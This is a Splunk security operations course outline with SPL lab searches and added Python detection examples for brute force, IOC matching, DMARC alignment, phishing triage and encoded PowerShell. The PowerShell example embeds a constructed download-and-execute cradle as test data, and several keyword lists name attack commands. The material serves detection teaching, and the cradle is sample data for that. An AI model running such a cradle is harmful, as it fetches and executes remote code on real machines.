Program Title
Splunk Security Operations Masterclass: Email Security, SIEM & Endpoint Detection
Duration
5 Days
Recommended format: 6-7 hours per day
Mode: Instructor-led + hands-on labs + final SOC investigation project
Target Audience
This program is suitable for:
| Audience | Benefit |
|---|---|
| SOC Analysts | Learn investigation and detection workflows |
| Security Engineers | Build searches, alerts, dashboards, and correlation logic |
| DevSecOps Engineers | Understand logging, endpoint telemetry, and SIEM integration |
| Splunk Beginners | Learn SPL, security data onboarding, and dashboards |
| Blue Team Learners | Practice phishing, endpoint, and SIEM use cases |
Prerequisites
Participants should have basic knowledge of:
| Area | Expected Knowledge |
|---|---|
| Linux/Windows | Basic commands, files, processes, services |
| Security | Malware, phishing, brute force, privilege escalation |
| Networking | IP, DNS, HTTP, SMTP, firewall logs |
| Splunk | Helpful but not mandatory |
| SIEM | Helpful but not mandatory |
Lab Environment
Recommended lab setup:
| Component | Purpose |
|---|---|
| Splunk Enterprise or Splunk Cloud Trial | Core log search and analysis |
| Splunk Enterprise Security, if available | SIEM, notable events, risk-based alerting |
| Splunk Security Essentials, if ES is not available | Detection use-case learning |
| Splunk CIM Add-on | Data normalization |
| Windows Event Logs / Sysmon Logs | Endpoint security labs |
| Linux auth/audit logs | Linux endpoint investigation |
| Email gateway logs or sample phishing logs | Email security labs |
| Sample firewall/proxy/DNS logs | Threat correlation |
| Optional Splunk SOAR | Automation and response |
| Optional Splunk Attack Analyzer | Email/phishing/malware analysis |
Important note: Splunk is not itself a replacement for a full EDR tool like CrowdStrike, Microsoft Defender for Endpoint, SentinelOne, or Carbon Black. In this program, "Endpoint Security with Splunk" means collecting endpoint telemetry, normalizing it, detecting suspicious behavior, correlating with SIEM events, and supporting investigation/response.
Day 1 - Splunk Security Foundation & SOC Data Onboarding
Theme
Build the Splunk foundation required for SIEM, email security, and endpoint monitoring.
Learning Objectives
By the end of Day 1, students will understand:
| Objective | Description |
|---|---|
| Splunk architecture | Indexers, search heads, forwarders, apps, add-ons |
| Security data onboarding | How logs enter Splunk |
| Indexing and sourcetypes | Why correct sourcetypes matter |
| SPL basics | Searching, filtering, transforming, reporting |
| CIM basics | Why normalized fields are important for SIEM use cases |
| SOC data sources | Email, endpoint, firewall, proxy, DNS, identity logs |
Morning Session: Concepts
1. What is Splunk in Security?
Topics:
- Splunk as a security analytics platform
- Difference between log management, SIEM, SOAR, UEBA, and XDR
- Where Splunk Enterprise Security fits
- SOC workflow: collect → normalize → detect → investigate → respond → report
2. Splunk Architecture for Security
Topics:
- Splunk Enterprise
- Splunk Cloud
- Universal Forwarder
- Heavy Forwarder
- Indexer
- Search Head
- Deployment Server
- Apps and Add-ons
- Splunk Enterprise Security
- Splunk SOAR
- Splunk Attack Analyzer
3. Security Log Sources
Important data sources:
| Category | Example Logs |
|---|---|
| Identity | AD, Okta, Azure AD, LDAP |
| Endpoint | Windows Event Logs, Sysmon, Linux auditd, EDR |
| Email | M365, Google Workspace, Proofpoint, Mimecast, Exchange |
| Network | Firewall, VPN, DNS, proxy |
| Cloud | AWS CloudTrail, Azure Activity Logs, GCP Audit Logs |
| Application | Web, API, authentication, transaction logs |
| Threat Intel | IOC feeds, reputation lists, malware hashes |
4. SPL Basics for Security
Core SPL search examples:
index=* earliest=-24h
index=security sourcetype=windows:security EventCode=4625
index=email action=blocked
| stats count by sender, recipient, subject
index=endpoint process_name=powershell.exe
| table _time host user process_name command_line
index=*
| stats count by sourcetype
Afternoon Hands-On Labs
Lab 1.1 - Explore Splunk Search
Tasks:
- Login to Splunk.
- Open Search & Reporting.
- Search all available indexes.
- Identify available sourcetypes.
- Find top hosts sending logs.
- Create a basic table of events.
Example SPL:
index=*
| stats count by index, sourcetype, host
| sort -count
Lab 1.2 - Create Security Indexes
Create sample indexes:
| Index | Purpose |
|---|---|
| email_security | Email gateway and phishing logs |
| endpoint_security | Endpoint logs |
| siem_security | General SIEM events |
| threat_intel | IOC and reputation data |
Lab 1.3 - Upload Sample Security Logs
Upload or ingest:
- Sample email logs
- Sample Windows security logs
- Sample Sysmon logs
- Sample DNS/proxy/firewall logs
Lab 1.4 - Basic Dashboard
Create a dashboard with:
| Panel | Purpose |
|---|---|
| Event count by sourcetype | Data inventory |
| Failed logins by user | Identity security |
| Top suspicious email senders | Email security |
| Top endpoint processes | Endpoint visibility |
| Top blocked destinations | Network security |
Day 1 Deliverables
Students should produce:
- Data source inventory
- Basic Splunk searches
- Security indexes
- First SOC visibility dashboard
Day 2 - Splunk SIEM with Enterprise Security Concepts
Theme
Learn how Splunk works as a SIEM: correlation, notable events, dashboards, risk-based alerting, and investigations.
Splunk Enterprise Security uses correlation searches and risk-based alerting concepts to help SOC teams reduce alert noise and prioritize higher-risk activity. (Splunk Docs)
Learning Objectives
By the end of Day 2, students will understand:
| Objective | Description |
|---|---|
| SIEM workflow | Detection, triage, investigation, response |
| Correlation searches | How SIEM detections are built |
| Notable events | How alerts become investigation items |
| Risk-based alerting | How multiple weak signals become stronger detections |
| Threat intelligence | IOC enrichment |
| MITRE ATT&CK mapping | Mapping detections to adversary behavior |
Morning Session: Concepts
1. What is SIEM?
SIEM stands for Security Information and Event Management.
Core SIEM capabilities:
| Capability | Description |
|---|---|
| Log collection | Gather security logs from many systems |
| Normalization | Convert different logs into common fields |
| Correlation | Connect related events |
| Detection | Identify suspicious activity |
| Alerting | Notify analysts |
| Investigation | Search and pivot across evidence |
| Reporting | Compliance and executive visibility |
2. Splunk Enterprise Security Overview
Topics:
- Security posture dashboards
- Incident Review
- Notable events
- Correlation searches
- Asset and identity framework
- Threat intelligence framework
- Risk-based alerting
- Investigation workflow
- Security domains
3. SIEM Detection Engineering
Detection design structure:
| Element | Example |
|---|---|
| Threat | Brute-force login |
| Data source | Windows Security Logs |
| Fields | user, src_ip, dest, action |
| Detection logic | 10 failed logins in 5 minutes |
| Severity | Medium/High |
| MITRE mapping | Credential Access |
| Response | Disable account, investigate host |
4. Risk-Based Alerting
Traditional alerting:
One rule fires = one alert
Risk-based alerting:
Multiple suspicious events + same user/host = higher risk score
Example:
| Event | Risk Score |
|---|---|
| Suspicious email clicked | 25 |
| PowerShell encoded command | 40 |
| Login from unusual country | 35 |
| Total risk for user | 100 |
Afternoon Hands-On Labs
Lab 2.1 - Failed Login Detection
Use failed authentication events.
Example SPL:
index=endpoint_security EventCode=4625
| stats count by user, src_ip
| where count > 5
| sort -count
Lab 2.2 - Brute Force Followed by Success
index=endpoint_security (EventCode=4625 OR EventCode=4624)
| stats
count(eval(EventCode=4625)) as failed_logins
count(eval(EventCode=4624)) as successful_logins
values(src_ip) as src_ip
by user
| where failed_logins >= 5 AND successful_logins >= 1
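The Lab 2.2 search counts failures and successes per user over the whole search window, so it also fires when the success happened first or hours before the failures. The following is an added example (not code from the course page) showing the same detection implemented with ordering and a time window, the way a detection engineer would unit-test the logic before turning it into a correlation search. Field names follow the lab; the thresholds, the 10-minute window and the sample events are assumptions and constructed data.

```python
"""Brute force followed by success, checked with ordering and a time window.

Added example, not code from the course page. The Lab 2.2 SPL counts 4625 and
4624 events per user over the whole search window, so it also fires when the
success came first or hours before the failures. This version requires the
failures to precede the success and to fall inside a window. Field names
follow the lab; thresholds and the sample events are assumptions/constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def _ev(time, code, user, src_ip):
    return {"_time": time, "EventCode": code, "user": user, "src_ip": src_ip}


# Constructed Windows Security events (4625 = failed logon, 4624 = success).
SAMPLE_EVENTS = (
    # alice: five failures in 30 seconds, then success from the same source
    [_ev(f"2024-05-01T09:00:{s:02d}", 4625, "alice", "10.0.0.5") for s in (5, 9, 14, 20, 27)]
    + [_ev("2024-05-01T09:00:31", 4624, "alice", "10.0.0.5")]
    # bob: success first, then five failures (a user who later mistyped a password)
    + [_ev("2024-05-01T10:00:00", 4624, "bob", "10.0.0.7")]
    + [_ev(f"2024-05-01T10:0{m}:00", 4625, "bob", "10.0.0.7") for m in range(1, 6)]
    # carol: five failures at 08:00, success eight hours later
    + [_ev(f"2024-05-01T08:00:{s:02d}", 4625, "carol", "10.0.0.9") for s in range(0, 50, 10)]
    + [_ev("2024-05-01T16:00:00", 4624, "carol", "10.0.0.9")]
)


def naive_stats_detection(events, min_failures=5):
    """Mirror of the Lab 2.2 SPL: per-user counts, no ordering, no window."""
    counts = defaultdict(lambda: {"failed": 0, "success": 0})
    for ev in events:
        if ev["EventCode"] == 4625:
            counts[ev["user"]]["failed"] += 1
        elif ev["EventCode"] == 4624:
            counts[ev["user"]]["success"] += 1
    return sorted(u for u, c in counts.items()
                  if c["failed"] >= min_failures and c["success"] >= 1)


def detect_brute_force_then_success(events, min_failures=5, window=timedelta(minutes=10)):
    """One finding per (user, src_ip) where at least min_failures failed logons
    are followed by a successful logon from the same source within `window`."""
    by_key = defaultdict(list)
    for ev in events:
        by_key[(ev["user"], ev["src_ip"])].append(ev)
    findings = []
    for (user, src_ip), evs in by_key.items():
        evs.sort(key=lambda e: e["_time"])  # ISO-8601 strings sort chronologically
        failures = []  # timestamps of failures since the last success
        for ev in evs:
            ts = datetime.fromisoformat(ev["_time"])
            if ev["EventCode"] == 4625:
                failures.append(ts)
                continue
            if ev["EventCode"] != 4624:
                continue
            recent = [t for t in failures if ts - t <= window]
            if len(recent) >= min_failures:
                findings.append({
                    "user": user,
                    "src_ip": src_ip,
                    "failed_logins": len(recent),
                    "first_failure": recent[0].isoformat(),
                    "success_time": ts.isoformat(),
                })
            failures = []  # a success ends the streak
    return findings


if __name__ == "__main__":
    print("naive:", naive_stats_detection(SAMPLE_EVENTS))
    for finding in detect_brute_force_then_success(SAMPLE_EVENTS):
        print("ordered:", finding)
```

On the constructed data the naive count flags all three users, while the ordered version flags only alice. In Splunk the same ordering constraint can be expressed with `transaction` or with `streamstats` over time-sorted events, at the cost of a heavier search.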
Lab 2.3 - Create a Correlation Search
Detection name:
Multiple Failed Logins Followed by Success
Severity:
High
MITRE mapping:
Credential Access / Brute Force
Action:
Create notable event or alert
Lab 2.4 - Threat Intel IOC Matching
Sample IOC lookup:
ioc,type,severity
malicious-domain.com,domain,high
185.10.20.30,ip,critical
badfilehash123,hash,high
Example SPL:
index=proxy OR index=dns
| lookup threat_ioc_lookup ioc as query OUTPUT severity type
| where isnotnull(severity)
| table _time host user query type severity
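The `lookup` above only fires when the raw `query` string is exactly equal to the feed's `ioc` value, so a subdomain of a listed domain, a trailing-dot FQDN, an upper-case hash, or a defanged feed entry all slip past it. The following is an added example (not code from the course page) of IOC matching that normalizes both sides and checks a domain against every parent domain in the feed. The feed rows and events are constructed, and the mapping of event fields to IOC types is an assumption.

```python
"""IOC matching that catches what an exact-match lookup misses.

Added example, not code from the course page. Normalizes feed and event values
(case, refanging, trailing dot, URL query string), checks a domain against the
feed entry for each of its parent domains, and resolves URL indicators to their
host. Feed rows and events are constructed; the event-field-to-IOC-type mapping
is an assumption.
"""
import csv
import io
from urllib.parse import urlsplit

# Constructed feed in the lab's CSV layout (198.51.100.0/24 is documentation space).
THREAT_FEED_CSV = """ioc,type,severity
malicious-domain.com,domain,high
198.51.100.30,ip,critical
badfilehash123,hash,high
hxxps://phish[.]example/login,url,high
"""

# Which event field carries which kind of indicator (assumption).
EVENT_FIELDS = {"query": "domain", "dest_ip": "ip", "file_hash": "hash", "url": "url"}


def normalize(value, ioc_type):
    """Lower-case, refang (hxxp, [.]), strip a trailing FQDN dot, drop URL query."""
    v = value.strip().lower().replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")
    if ioc_type in ("domain", "ip"):
        v = v.rstrip(".")
    elif ioc_type == "url":
        p = urlsplit(v)
        v = f"{p.scheme}://{p.netloc}{p.path or '/'}"  # compare without query/fragment
    return v


def load_feed(csv_text):
    feed = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        feed[(row["type"], normalize(row["ioc"], row["type"]))] = row
    return feed


def candidates(value, ioc_type):
    """Every feed key an event value should be compared with."""
    v = normalize(value, ioc_type)
    if ioc_type == "domain":
        labels = v.split(".")
        # the name itself and each parent domain, never the bare TLD
        return [(ioc_type, ".".join(labels[i:])) for i in range(len(labels) - 1)]
    if ioc_type == "url":
        host = urlsplit(v).hostname or ""
        return [(ioc_type, v)] + (candidates(host, "domain") if host else [])
    return [(ioc_type, v)]


def exact_lookup_hits(events, feed):
    """Mirror of the SPL lookup on the query field: raw value must equal the ioc."""
    return [ev for ev in events if ("domain", ev.get("query", "")) in feed]


def scan(events, feed):
    """Return one hit per event field that matches a feed indicator."""
    hits = []
    for ev in events:
        for field, ioc_type in EVENT_FIELDS.items():
            value = ev.get(field)
            if not value:
                continue
            for key in candidates(value, ioc_type):
                row = feed.get(key)
                if row:
                    hits.append({"host": ev["host"], "user": ev["user"], "field": field,
                                 "value": value, "ioc": row["ioc"], "type": row["type"],
                                 "severity": row["severity"]})
                    break  # the most specific match wins for this field
    return hits


# Constructed DNS, proxy and endpoint events.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "victim.user", "query": "cdn.MALICIOUS-domain.com."},
    {"host": "WS02", "user": "bob", "query": "www.example.com"},
    {"host": "WS01", "user": "victim.user", "dest_ip": "198.51.100.30"},
    {"host": "WS03", "user": "carol", "file_hash": "BADFILEHASH123"},
    {"host": "WS04", "user": "dan", "url": "https://phish.example/login?u=dan"},
]

if __name__ == "__main__":
    feed = load_feed(THREAT_FEED_CSV)
    print("exact lookup:", len(exact_lookup_hits(SAMPLE_EVENTS, feed)), "hits")
    for hit in scan(SAMPLE_EVENTS, feed):
        print(hit)
```

The exact lookup returns nothing on these events; the normalized scan returns four hits. In Splunk the equivalent is a lookup with `case_sensitive_match=false` plus a `WILDCARD(ioc)` match type, or an `eval` that derives the parent domain before the lookup.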
Lab 2.5 - SIEM Dashboard
Create panels:
| Panel | Purpose |
|---|---|
| High severity alerts | SOC triage |
| Top risky users | Risk-based investigation |
| Top risky hosts | Endpoint priority |
| Threat intel matches | IOC visibility |
| Failed login trends | Identity attack tracking |
Day 2 Deliverables
Students should produce:
- SIEM detection search
- Correlation search design
- Threat intelligence lookup
- SOC triage dashboard
- Basic investigation workflow
Day 3 - Splunk for Email Security & Phishing Investigation
Theme
Detect and investigate phishing, malicious attachments, suspicious links, spoofing, and compromised mailboxes.
Splunk Attack Analyzer can automate analysis of phishing and malware threats, including suspicious emails, URLs, files, and attack chains. Splunk documentation also describes phishing investigation workflows inside Splunk Enterprise Security powered by Attack Analyzer. (Splunk Lantern)
Learning Objectives
By the end of Day 3, students will understand:
| Objective | Description |
|---|---|
| Email attack types | Phishing, spoofing, BEC, malware, spam |
| Email security logs | Sender, recipient, subject, URL, attachment, verdict |
| Email CIM mapping | Normalize email logs |
| Phishing investigation | Analyze sender, URL, attachment, recipients |
| Attack Analyzer | Automated phishing/malware analysis |
| SOAR workflow | Automate investigation and response |
Morning Session: Concepts
1. Email Security Fundamentals
Common email threats:
| Threat | Description |
|---|---|
| Phishing | Fake email designed to steal credentials |
| Spear phishing | Targeted phishing |
| Business Email Compromise | Fraud using trusted identity |
| Malware attachment | File-based compromise |
| Malicious URL | Link to phishing or malware site |
| Spoofing | Forged sender identity |
| Account takeover | Real mailbox used maliciously |
2. Important Email Security Fields
| Field | Example |
|---|---|
| sender | attacker@example.com |
| recipient | user@company.com |
| subject | Password Expiry Notice |
| src_ip | Sender IP |
| attachment_name | invoice.exe |
| url | hxxp://fake-login.example |
| verdict | malicious/suspicious/clean |
| action | delivered/blocked/quarantined |
| message_id | Unique email ID |
3. Email Authentication Concepts
Students should understand:
| Control | Purpose |
|---|---|
| SPF | Checks allowed sending servers |
| DKIM | Verifies message signing |
| DMARC | Defines domain policy for SPF/DKIM failures |
| URL rewriting | Tracks and protects clicked links |
| Sandboxing | Executes suspicious file safely |
| Quarantine | Holds suspicious email |
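Gateways and M365 record the result of these checks in the Authentication-Results header (RFC 8601), which is usually available in the email logs. The following is an added example (not code from the course page) that parses that header and applies the DMARC rule: the message passes when SPF passes with a domain aligned to the From: domain, or DKIM passes with an aligned d= domain. Relaxed alignment is approximated by comparing the last two DNS labels, which is wrong for registries such as co.uk (real DMARC uses the Public Suffix List); the headers are constructed and company.com stands for the protected internal domain.

```python
"""Evaluate SPF, DKIM and DMARC alignment from an Authentication-Results header.

Added example, not code from the course page. Parses the header and applies the
DMARC rule (aligned SPF pass or aligned DKIM pass). Organizational-domain
alignment is simplified to the last two labels (assumption). Headers are
constructed; company.com is the assumed internal domain.
"""
import re


def parse_auth_results(header):
    """Turn 'authserv; spf=pass smtp.mailfrom=x; dkim=pass header.d=y' into a dict
    keyed by method, e.g. {'spf': {'result': 'pass', 'smtp.mailfrom': 'x'}}."""
    results = {}
    for clause in header.split(";")[1:]:  # first segment is the authserv-id
        clause = re.sub(r"\([^)]*\)", "", clause)  # drop (comments)
        pairs = dict(re.findall(r"([\w.]+)=(\S+)", clause))
        for method in ("spf", "dkim", "dmarc"):
            if method in pairs:
                props = {k: v.lower() for k, v in pairs.items() if k != method}
                results[method] = {"result": pairs[method].lower(), **props}
    return results


def org_domain(domain):
    """Approximate organizational domain = last two labels (assumption, see above)."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(auth_domain, from_domain, strict=False):
    if strict:
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


def dmarc_verdict(header, from_domain, strict=False):
    """Return ('pass', reason) or ('fail', reason) for the RFC5322.From domain."""
    r = parse_auth_results(header)
    spf, dkim = r.get("spf", {}), r.get("dkim", {})
    if spf.get("result") == "pass" and aligned(spf.get("smtp.mailfrom", ""), from_domain, strict):
        return "pass", "spf aligned"
    if dkim.get("result") == "pass" and aligned(dkim.get("header.d", ""), from_domain, strict):
        return "pass", "dkim aligned"
    return "fail", "no aligned authenticated identifier"


def flags_internal_spoof(header, from_domain, internal_domain="company.com"):
    """Lab 3.2 with authentication evidence: a message claiming an internal From:
    domain without an aligned SPF/DKIM pass is treated as spoofed."""
    return (org_domain(from_domain) == org_domain(internal_domain)
            and dmarc_verdict(header, from_domain)[0] == "fail")


# Constructed headers.
LEGIT = ("mx.company.com; spf=pass (sender IP is 192.0.2.10) smtp.mailfrom=bounce.company.com; "
         "dkim=pass header.d=company.com header.s=sel1; dmarc=pass header.from=company.com")
SPOOF = ("mx.company.com; spf=pass smtp.mailfrom=bulk-sender.example; dkim=none; "
         "dmarc=fail header.from=company.com")
PARTNER = ("mx.company.com; spf=fail smtp.mailfrom=mailer.partner.example; "
           "dkim=pass header.d=news.company.com header.s=k1")

if __name__ == "__main__":
    for name, hdr in (("LEGIT", LEGIT), ("SPOOF", SPOOF), ("PARTNER", PARTNER)):
        print(name, dmarc_verdict(hdr, "company.com"),
              "internal spoof:", flags_internal_spoof(hdr, "company.com"))
```

Note that SPOOF shows SPF passing: the attacker's own bulk-sending domain is authorized for itself, which is why SPF alone never proves the From: header and alignment is the check that matters.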
4. Phishing Investigation Workflow
Recommended workflow:
Suspicious Email Alert
↓
Check Sender Reputation
↓
Analyze Subject and Body
↓
Extract URLs and Attachments
↓
Check Recipients
↓
Check Click Activity
↓
Check Endpoint Activity
↓
Contain Mailbox / Host
↓
Close Investigation
Afternoon Hands-On Labs
Lab 3.1 - Top Suspicious Email Senders
index=email_security
| stats count by sender, sender_domain, action, verdict
| sort -count
Lab 3.2 - Detect External Sender Spoofing Internal Domain
index=email_security sender_domain="company.com" src_ip!="trusted_mail_gateway_ip"
| table _time sender recipient subject src_ip action verdict
Lab 3.3 - Detect Malicious Attachments
index=email_security attachment_name=*
| eval suspicious_attachment=if(match(attachment_name, "(?i)\.(exe|scr|js|vbs|hta|iso|img|lnk)$"), "yes", "no")
| where suspicious_attachment="yes"
| table _time sender recipient subject attachment_name verdict action
Lab 3.4 - Detect Suspicious URLs
index=email_security url=*
| eval suspicious_url=if(match(url, "(login|verify|password|invoice|payment|secure)"), "yes", "no")
| where suspicious_url="yes"
| stats count values(url) as urls by sender, recipient, subject
Lab 3.5 - Phishing Campaign Detection
index=email_security
| stats
dc(recipient) as unique_recipients
values(recipient) as recipients
values(url) as urls
values(attachment_name) as attachments
by sender, subject
| where unique_recipients > 10
| sort -unique_recipients
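The following is an added example (not code from the course page) that runs the logic of Labs 3.3 to 3.5 in one pass over constructed gateway events. Compared with the searches above it matches extensions case-insensitively, calls out a document-looking name followed by an executable extension as the double-extension trick, refangs defanged URLs (hxxp, [.]) before inspection, and skips internal hosts in the credential-keyword check to cut noise. Field names follow the labs; company.com is the assumed internal domain.

```python
"""Attachment, URL and campaign triage over email gateway events.

Added example, not code from the course page; covers Labs 3.3 to 3.5.
Events are constructed; field names follow the lab, and company.com is the
assumed internal domain.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

DANGEROUS_EXT = re.compile(r"\.(exe|scr|js|vbs|hta|iso|img|lnk)$", re.IGNORECASE)
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|txt)\.[^.]+$", re.IGNORECASE)
CRED_KEYWORDS = re.compile(r"login|verify|password|invoice|payment|secure", re.IGNORECASE)
INTERNAL_DOMAINS = ("company.com",)  # assumption


def refang(url):
    return url.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def attachment_reason(name):
    """Why an attachment name is suspicious, or None."""
    if not name or not DANGEROUS_EXT.search(name):
        return None
    return "double-extension executable" if DOUBLE_EXT.search(name) else "executable extension"


def url_reason(url):
    """Why a URL is suspicious, or None; internal hosts are never flagged."""
    if not url:
        return None
    parts = urlsplit(refang(url))
    host = (parts.hostname or "").lower()
    if any(host == d or host.endswith("." + d) for d in INTERNAL_DOMAINS):
        return None
    if CRED_KEYWORDS.search(host) or CRED_KEYWORDS.search(parts.path + "?" + parts.query):
        return "credential-harvesting keyword"
    return None


def find_campaigns(events, min_recipients=10):
    """Group by (sender, subject) like the Lab 3.5 stats and keep groups whose
    distinct recipient count exceeds min_recipients, with per-group reasons."""
    groups = defaultdict(lambda: {"recipients": set(), "urls": set(), "attachments": set()})
    for ev in events:
        g = groups[(ev["sender"], ev["subject"])]
        g["recipients"].add(ev["recipient"])
        if ev.get("url"):
            g["urls"].add(ev["url"])
        if ev.get("attachment_name"):
            g["attachments"].add(ev["attachment_name"])
    campaigns = []
    for (sender, subject), g in groups.items():
        if len(g["recipients"]) > min_recipients:
            campaigns.append({
                "sender": sender, "subject": subject,
                "unique_recipients": len(g["recipients"]),
                "urls": sorted(g["urls"]), "attachments": sorted(g["attachments"]),
                "url_reasons": sorted({r for r in map(url_reason, g["urls"]) if r}),
                "attachment_reasons": sorted({r for r in map(attachment_reason, g["attachments"]) if r}),
            })
    return sorted(campaigns, key=lambda c: -c["unique_recipients"])


# Constructed gateway events: one 12-recipient credential-phishing wave plus two singles.
SAMPLE_EMAILS = [
    {"sender": "it-support@secure-mail.example", "recipient": f"user{i}@company.com",
     "subject": "Urgent: Password Verification Required",
     "url": "hxxp://company-login[.]example/verify", "attachment_name": None}
    for i in range(12)
] + [
    {"sender": "billing@vendor.example", "recipient": "alice@company.com", "subject": "Invoice 4471",
     "url": None, "attachment_name": "Invoice_4471.pdf.EXE"},
    {"sender": "hr@company.com", "recipient": "bob@company.com", "subject": "Benefits enrollment",
     "url": "https://hr.company.com/login", "attachment_name": "benefits.pdf"},
]

if __name__ == "__main__":
    for campaign in find_campaigns(SAMPLE_EMAILS):
        print(campaign)
    for ev in SAMPLE_EMAILS[12:]:
        print(ev["subject"], attachment_reason(ev["attachment_name"]), url_reason(ev["url"]))
```

Keyword lists are a starting point, not a verdict: the reason strings are meant to be shown next to the gateway's own `verdict` field so the analyst can see why a message was surfaced.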
Lab 3.6 - Email-to-Endpoint Pivot
Scenario:
A user received a phishing email and clicked a URL. Now check endpoint activity.
Step 1: Find recipient.
index=email_security verdict=malicious
| table _time sender recipient subject url attachment_name
Step 2: Pivot to endpoint.
index=endpoint_security user="victim.user"
| table _time host user process_name command_line parent_process_name
Step 3: Look for suspicious browser or PowerShell activity.
index=endpoint_security user="victim.user"
(process_name="powershell.exe" OR process_name="cmd.exe" OR process_name="wscript.exe" OR process_name="mshta.exe")
| table _time host user process_name command_line parent_process_name
Lab 3.7 - Email Security Dashboard
Create dashboard panels:
| Panel | Purpose |
|---|---|
| Malicious emails by verdict | Email threat visibility |
| Top phishing senders | Campaign detection |
| Top targeted users | User risk |
| Suspicious attachments | Malware tracking |
| URL clicks by user | Compromise investigation |
| Email action summary | Delivered vs blocked |
Day 3 Deliverables
Students should produce:
- Email security search pack
- Phishing investigation workflow
- Email security dashboard
- Email-to-endpoint pivot process
- Phishing campaign detection report
Day 4 - Splunk for Endpoint Security
Theme
Detect suspicious endpoint behavior using Windows, Linux, Sysmon, EDR, and process telemetry.
The Splunk CIM Endpoint data model is designed for monitoring endpoint clients such as user machines and laptops. It covers endpoint-related events such as processes, services, files, and ports. (docs.splunk.com)
Learning Objectives
By the end of Day 4, students will understand:
| Objective | Description |
|---|---|
| Endpoint telemetry | Process, file, registry, service, network |
| Windows security logs | Logon, privilege use, account changes |
| Sysmon logs | Process creation, network, file, registry |
| Linux endpoint logs | auth.log, auditd, sudo, SSH |
| EDR integration | How EDR logs support SIEM |
| Malware behavior | PowerShell, persistence, lateral movement |
| Endpoint dashboards | Host and user investigation views |
Morning Session: Concepts
1. Endpoint Security Data Sources
| Source | Use |
|---|---|
| Windows Security Logs | Authentication, privilege, account changes |
| Sysmon | Process, network, file, registry behavior |
| PowerShell Logs | Script execution and suspicious commands |
| Linux auth logs | SSH, sudo, failed login |
| auditd | Linux process and file activity |
| EDR logs | Malware, behavioral detection, quarantine |
| DNS/proxy logs | External communication from endpoint |
2. Important Windows Event IDs
| Event ID | Meaning |
|---|---|
| 4624 | Successful login |
| 4625 | Failed login |
| 4672 | Special privileges assigned |
| 4688 | Process creation |
| 4720 | User account created |
| 4728 | User added to privileged group |
| 4732 | User added to local group |
| 7045 | New service installed |
3. Endpoint Attack Behaviors
| Behavior | Example |
|---|---|
| Suspicious PowerShell | Encoded command |
| Credential dumping | LSASS access |
| Persistence | New service, scheduled task |
| Lateral movement | Remote admin tools |
| Malware execution | Suspicious child process |
| Defense evasion | Disabling antivirus |
| Data staging | Archive files created |
| Exfiltration | Upload to unknown destination |
4. Endpoint Detection Workflow
Endpoint Alert
↓
Identify Host and User
↓
Review Process Tree
↓
Check Parent/Child Process
↓
Check Network Connections
↓
Check File/Registry Changes
↓
Correlate with Email, DNS, Proxy, Identity
↓
Contain or Escalate
Afternoon Hands-On Labs
Lab 4.1 - Suspicious PowerShell Detection
index=endpoint_security process_name="powershell.exe"
| where match(command_line, "(?i)(-enc|encodedcommand|downloadstring|iex|invoke-expression|bypass)")
| table _time host user parent_process_name process_name command_line
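An encoded command hides the real cradle (DownloadString, IEX) inside base64 of UTF-16LE text, so the keyword rule above only ever sees `-enc` and nothing about what runs. The following is an added example (not code from the course page) that decodes the payload, runs the keyword check on both the raw and the decoded command line, and adds the Office-parent check from Lab 4.2. Process events are constructed and the encoded payload is generated in the block from a known string; the keyword list and switch spellings cover the common forms only.

```python
"""Decode PowerShell -EncodedCommand payloads before keyword matching.

Added example, not code from the course page. Process events are constructed
and the encoded payload is generated here from a known string so the block is
self-contained. Keyword and switch spellings cover the common forms only.
"""
import base64
import re

# Common spellings of the encoded-command switch followed by a base64 token.
ENC_FLAG = re.compile(r"(?i)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
SUSPICIOUS = re.compile(r"(?i)(downloadstring|downloadfile|invoke-expression|\biex\b|"
                        r"frombase64string|invoke-webrequest|bypass|hidden)")
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}


def decode_encoded_command(b64):
    """Return the decoded UTF-16LE command, or None if the token is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(command_line):
    """Reasons a PowerShell command line is suspicious, plus the decoded payload."""
    reasons = set()
    decoded = None
    m = ENC_FLAG.search(command_line)
    if m:
        reasons.add("encoded command")
        decoded = decode_encoded_command(m.group(1))
    for text in (command_line, decoded or ""):
        for kw in SUSPICIOUS.findall(text):
            reasons.add(kw.lower())
    return {"decoded": decoded, "reasons": sorted(reasons)}


def triage_processes(events):
    """Return the process events worth an analyst's time, with their reasons."""
    hits = []
    for ev in events:
        if ev["process_name"].lower() != "powershell.exe":
            continue
        result = analyze_command_line(ev["command_line"])
        reasons = set(result["reasons"])
        if ev["parent_process_name"].lower() in OFFICE_PARENTS:
            reasons.add("office parent")
        if reasons:
            hits.append({**ev, "decoded": result["decoded"], "reasons": sorted(reasons)})
    return hits


def encode_ps(command):
    """How PowerShell expects -EncodedCommand: base64 over UTF-16LE."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


# Constructed process-creation events (203.0.113.10 is documentation address space).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
SAMPLE_PROCESSES = [
    {"host": "WS01", "user": "victim.user", "parent_process_name": "outlook.exe",
     "process_name": "powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + encode_ps(CRADLE)},
    {"host": "WS02", "user": "admin.jane", "parent_process_name": "explorer.exe",
     "process_name": "powershell.exe",
     "command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"host": "WS03", "user": "bob", "parent_process_name": "explorer.exe",
     "process_name": "powershell.exe", "command_line": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for hit in triage_processes(SAMPLE_PROCESSES):
        print(hit["host"], hit["reasons"], hit["decoded"])
```

WS02 is surfaced only for `Bypass`, which an admin's signed inventory script will trigger every day; that is the kind of hit a risk score should weigh lightly, while WS01 carries the decoded download cradle and an Office parent and deserves a notable on its own.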
